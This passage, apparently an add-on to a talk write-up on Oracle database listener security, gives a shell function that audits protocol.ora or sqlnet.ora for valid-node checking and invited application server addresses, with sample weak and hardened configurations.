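As an added example that is not part of the original talk, the following shell function audits the valid-node checking recommended in the wrap-up: it reads a protocol.ora (with Oracle 9i and later the same keys live in sqlnet.ora on the listener host) and verifies that tcp.validnode_checking is on and that every application server address passed to it is in tcp.invited_nodes. The two configurations it is run against are constructed here; the weak one is a listener open to the whole network, the good one is Figure 10 filled with the two application servers found earlier.

```shell
#!/bin/sh
# Added example, not from the talk: audit the valid-node checking of the
# wrap-up. Reads an Oracle 8 protocol.ora on stdin (Oracle 9i and later use
# the same keys in sqlnet.ora) and takes as arguments the addresses that must
# still reach the listener, i.e. every application server of the system.
# Returns 0 only if tcp.validnode_checking is on and every address is invited.
check_validnode() {
    cfg=$(sed -e 's/#.*//' | tr '[:upper:]' '[:lower:]')   # drop comments, normalise case
    enabled=$(printf '%s' "$cfg" | grep 'tcp.validnode_checking' | sed -e 's/.*=//' | tr -d ' ')
    if [ "$enabled" != "yes" ]; then
        echo "FAIL: tcp.validnode_checking is not set to yes, every host may connect"
        return 1
    fi
    invited=$(printf '%s' "$cfg" | grep 'tcp.invited_nodes' | sed -e 's/.*=//' | tr -d '() ')
    rc=0
    for host in "$@"; do
        case ",$invited," in
            *",$host,"*) ;;
            *) echo "FAIL: $host is not in tcp.invited_nodes and will be refused"; rc=1 ;;
        esac
    done
    if [ "$rc" -eq 0 ]; then echo "OK: listener restricted to $invited"; fi
    return "$rc"
}

# Constructed samples: an unrestricted listener, and the protocol.ora of
# Figure 10 with the two application servers found earlier invited.
WEAK_CFG='tcp.nodelay = true'
GOOD_CFG='tcp.nodelay = true
tcp.validnode_checking = yes
tcp.invited_nodes = (192.168.10.1, 192.168.10.7)'

# Stand-alone run: the weak file fails, the good file passes for its two
# servers and fails as soon as a third application server is added.
printf '%s' "$WEAK_CFG" | check_validnode 192.168.10.1 || true
printf '%s' "$GOOD_CFG" | check_validnode 192.168.10.1 192.168.10.7
printf '%s' "$GOOD_CFG" | check_validnode 192.168.10.1 192.168.10.9 || true
```

Run it with the real file on the database host and the list of application servers from the sniffer or from lgtst; a FAIL for a server that is in production use means that server is being refused by the listener, a FAIL for validnode checking means the attack described above still works.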